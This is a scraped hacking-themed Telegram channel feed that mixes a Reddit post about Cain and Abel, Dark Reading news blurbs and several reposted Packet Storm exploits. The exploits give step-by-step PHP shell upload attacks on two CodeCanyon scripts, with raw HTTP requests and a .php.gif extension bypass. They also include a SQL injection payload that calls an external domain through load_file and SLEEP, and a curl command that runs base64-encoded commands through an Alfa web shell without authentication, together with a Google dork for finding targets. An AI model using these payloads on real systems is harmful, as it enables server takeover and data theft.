Hacking Articles Tips Tricks Videos Tutorials
468 subscribers
65.8K photos
15 videos
157 files
132K links
Exploit
Pentesting
Hacking
Red Team
Blue Team
Kali Linux
Bug Bounty
Black Hat
Cyber security etc

@Hacking_Video
@Hacking_attack
Download Telegram
hacking: security in practice
Cain and Abel in 2021?

I was 11 when I started hacking. I really got into it when I was 13 or 14, and I remember at the time Cain and Abel was the magic tool for hacking.

It had a lot of stuff in it. I never ended up using it much, but I personally believe it has a place in the hall of fame.

All these years later, hacking has progressed so far. I’m wondering how practical and useful Cain and Abel would be in 2021? I’m not asking IF I should use it, because I probably won’t. But hypothetically, how useful would it be today? Do any of the features still work? Are they still practical?

submitted by /u/fantasmafuemiclave
[link] [comments]
Hacking Articles Tips Tricks Videos Tutorials
Photo
Exploit Collector
Bazaar Web PHP Social Listings Shell Upload

https://1.bp.blogspot.com/-f08tQl4ET7w/WWlvRxSI6FI/AAAAAAAAINU/PQjq5zhIC6AFgb3OPDnJIpwa9KgUsaunwCLcBGAs/s1600/h37.png
Bazaar Web PHP Social Listings suffers from a remote shell upload vulnerability.

MD5 | 332c8c67d69bd164ce7cf1a517267229

Download


# Exploit Title: Bazaar Web PHP Social Listings Arbitrary File Upload
# Google Dork: N/A
# Date: 19/12/2021
# Exploit Author: Sohel Yousef - sohel.yousef@yandex.com
# Software Link: https://codecanyon.net/item/bazaar-social-listing-shopping-web-php-template/23207913
# Software Demo :https://xserver.app/__apps/bazaar-web/index.php#
# Category: webapps

1. Description

Bazaar Web PHP Social Listings script contain arbitrary file upload
registered user can upload .php files in Edit an item section without
any security

list item link :

localhost bazaar-web/list-item-info.php

edit item photos and upload php files and inspect element your php
direction

uploaded file direction

local host bazaar/uploads/yourfile.php

just right click the photo and use inspect element you will have your
direction
Host: (HOST)

Accept: */*

Accept-Language: ar,en-US;q=0.7,en;q=0.3

Accept-Encoding: gzip, deflate, br

X-Requested-With: XMLHttpRequest

Content-Type: multipart/form-data; boundary=---------------------------47450779111254302601850437199

Content-Length: 63132

Connection: keep-alive

Referer: https:/localhost/bazaar-web/list-item-info.php?itemID=uT8aeJcTu5

Cookie: AWSALB=BOOAELkwd/6yNqpv36ou/NXmOgXJcpsfK+qMH36RZwhotfk/zd8hoyDpbc2Qt4nwl1mw8CBJm0bJTwoci7kY6kAfwutcXuxjFCKoSPXqis2mMnE1ab8qwGquZOYI; AWSALBCORS=BOOAELkwd/6yNqpv36ou/NXmOgXJcpsfK+qMH36RZwhotfk/zd8hoyDpbc2Qt4nwl1mw8CBJm0bJTwoci7kY6kAfwutcXuxjFCKoSPXqis2mMnE1ab8qwGquZOYI; PHPSESSID=o0it0cquadspsgh864fr4mvtrt

Sec-Fetch-Dest: empty

Sec-Fetch-Mode: cors

Sec-Fetch-Site: same-origin

file=fx.php&fileName=fx.php

GET
https://localhost/bazaar/uploads/pZ2CGSkezbiDprchqpZ7_fx.php

Host: HOST

User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0

Accept: image/avif,image/webp,*/*

Accept-Language: ar,en-US;q=0.7,en;q=0.3

Accept-Encoding: gzip, deflate, br

Connection: keep-alive

Referer: https://localhost/bazaar-web/list-item-info.php?itemID=uT8aeJcTu5

Cookie: AWSALB=Zl/BPrqEgbVqCknGhgr3fTBKhe+vxhq2WkKOn6NZEvstF659/bY85gK5a9rehQC9ejX8mXIhp/F5HoMd7iiNXUs0PKBGysX6kGrjeS2ZnnmHHfe6wwZNqWYQbbRx; AWSALBCORS=Zl/BPrqEgbVqCknGhgr3fTBKhe+vxhq2WkKOn6NZEvstF659/bY85gK5a9rehQC9ejX8mXIhp/F5HoMd7iiNXUs0PKBGysX6kGrjeS2ZnnmHHfe6wwZNqWYQbbRx; PHPSESSID=o0it0cquadspsgh864fr4mvtrt

Sec-Fetch-Dest: image

Sec-Fetch-Mode: no-cors

Sec-Fetch-Site: same-origin
#####

-->

Source:packetstormsecurity.com
Hacking Articles Tips Tricks Videos Tutorials
Photo
Exploit Collector
Signup PHP Portal 2.1 Shell Upload

https://2.bp.blogspot.com/-U4x-65bW3GQ/WWlvNN9osvI/AAAAAAAAIMY/h5EIQTz5wbsbDMf6z0LfMa0yML4cI035gCLcBGAs/s1600/h21.png
Signup PHP Portal version 2.1 suffers from a remote shell upload vulnerability.

MD5 | e464561cff8e90dcfa451a5ce5f9f8d5

Download


# Exploit Title: Signup Php Portal Arbitrary File Upload
# Google Dork: N/A
# Date: 19/12/2021
# Exploit Author: Sohel Yousef - sohel.yousef@yandex.com
# Software Link: https://codecanyon.net/item/signup-php-portal/23066564
# Software Demo :https://ocsolutions.co.in/signup_custom_script/customer_register.php
# Category: webapps
# Version: 2.1

1. Description

Signup Php Portal script contain arbitrary file upload
using the form you can upload php files and bypass secuirty with burb suite intercept tool

signup link :

https://localhost/signup_custom_script/customer_register.php

in the section of other images upload your file.php.gif and use intercept tool in burbsuite to edit the raw

details

POST /signup_custom_script/upload.php HTTP/1.1
Host: host
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0
Accept: */*
Accept-Language: ar,en-US;q=0.7,en;q=0.3
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data; boundary=---------------------------232155580731505179933631361962
Content-Length: 294712
Origin: https://localhost
Connection: close
Referer: https://localhost/signup_custom_script/customer_register.php
Cookie: language=en-gb; currency=GBP; PHPSESSID=055209d5effdb7d44487349cbd66243e
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin

-----------------------------232155580731505179933631361962
Content-Disposition: form-data; name="name"

p1fna9ivqhk6g1fbjqto1f711ooq9.gif <-------
-----------------------------232155580731505179933631361962
Content-Disposition: form-data; name="file"; filename="2.php.gif" <-------
Content-Type: image/gif

#####
forward and all done

your file name will be
p1fna9ivqhk6g1fbjqto1f711ooq9.php

and this is the upload dir

https://localhost//signup_custom_script/uploads/

your file will be on this link

https://localhost//signup_custom_script/uploads/p1fna9ivqhk6g1fbjqto1f711ooq9.php
-->

Source:packetstormsecurity.com
Hacking Articles Tips Tricks Videos Tutorials
Photo
Exploit Collector
Video Sharing Website 1.0 SQL Injection

https://2.bp.blogspot.com/-TEKdvnpzXEU/WWlu-1G01LI/AAAAAAAAIJ8/FsoklfFFqiwHwKy6Rf6U36sgF7K28-hPgCLcBGAs/s1600/h118.png
Video Sharing Website version 1.0 appears to suffer from a remote SQL injection vulnerability.

MD5 | 65e77333e6364fe5c870b357cfd4ecfd

Download
## Title: Video Sharing Website 1.0 SQL - Injection
## Author: nu11secur1ty
## Date: 12.18.2021
## Vendor: https://www.sourcecodester.com/users/tips23
## Software: https://www.sourcecodester.com/php/14584/video-sharing-website-using-phpmysqli-source-code.html

## Description:
The `email` parameter from `ajax.php` app of Video Sharing Website 1.0
appears to be vulnerable to SQL injection attacks. The payload
'+(select load_file('\\\\dhy5y62urpxije56fiteqimmjdp6dy6mxplh87ww.nu11secur1ty.net\\pkq'))+'
was submitted in the email parameter.
This payload injects a SQL sub-query that calls MySQL's load_file
function with a UNC file path that references a URL on an external
domain.
The application interacted with that domain, indicating that the
injected SQL query was executed. The attacker can take administrator
account controll on this system.
Status: CRITICAL

[+] Payload:

```mysql
---
Parameter: email (POST)
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: email=jsmith@sample.com'+(select
load_file('\\\\dhy5y62urpxije56fiteqimmjdp6dy6mxplh87ww.nu11secur1ty.net\\pkq'))+''
AND (SELECT 8549 FROM (SELECT(SLEEP(5)))PJEk) AND
'yreq'='yreq&password=jsmith123
---
```

## Reproduce:
[href](https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/oretnom23/Video-Sharing-Website)

## Proof and Exploit:
[href](https://streamable.com/4x2rfk)


Source:packetstormsecurity.com
Hacking Articles Tips Tricks Videos Tutorials
Photo
Exploit Collector
Alfa Team Shell Tesla 4.1 Remote Code Execution

https://2.bp.blogspot.com/-GUn1a49o67Q/WWlu9F-J_rI/AAAAAAAAIJo/HAAKEGfKUXIq4oSJFA9qEBzdRn_AvSgtACLcBGAs/s1600/h113.png
Alfa Team Shell Tesla version 4.1 suffers from a remote code execution vulnerability.

MD5 | 4e1d936cbae22ea2647ee9d7e6127458

Download
# Exploit Title: ALFA TEAM SHELL TESLA 4.1 - 'cmd' Remote Code Execution (Unauthenticated)
# Google Dork: inurl:/alfacgiapi intext:alfa
# Date: 2021-12-19
# Exploit Author: Aryan Chehreghani
# Vendor Homepage: http://solevisible.com
# Software Link: https://phpshells.com/alfa-tesla-v4-1-shell
# Version: v4.1
# Tested on: Windows 10 Enterprise x64 , Linux

# [ About - ALFA TEAM SHELL TESLA ] :

#It is one of the most popular web shells used by hackers,They use it to access the server side.

# [ Vulnerable Files ] :

# 1 . perl.alfa
# 2 . bash.alfa
# 3 . py.alfa

# [ Description ]:

#Execute commands without authentication or logging in to the web shell,
#To use, find only one of the vulnerable files,
#Convert your commands to base64 And Submit your request using the CMD parameter and the POST method.

# [ POC ] :

curl -d "cmd=bHMgLWxh" -X POST http://localhost/alfacgiapi/perl.alfa

Source:packetstormsecurity.com
Dark Reading: Attacks/Breaches
Zero Trust Shouldn’t Mean Zero Trust in Employees

Some think zero trust means you cannot or should not trust employees, an approach that misses the mark and sets up everyone for failure.
Dark Reading: Attacks/Breaches
Lights Out: Cyberattacks Shut Down Building Automation Systems

Security experts in Germany discover similar attacks that lock building engineering management firms out of the BASes they built and manage — by turning a security feature against them.
Hacking Articles Tips Tricks Videos Tutorials
Photo
Dark Reading: Attacks/Breaches
Four Out of Five Organizations Are Increasing Cybersecurity Budgets for 2022

Half of security decision makers also say the cyber skills gap will significantly impact their 2022 strategy, according to new research from Neustar.
Hacking Articles Tips Tricks Videos Tutorials
Photo
Dark Reading: Attacks/Breaches
Reblaze Appoints New CEO

Ziv Oren previously held the position of chief operations officer at the company.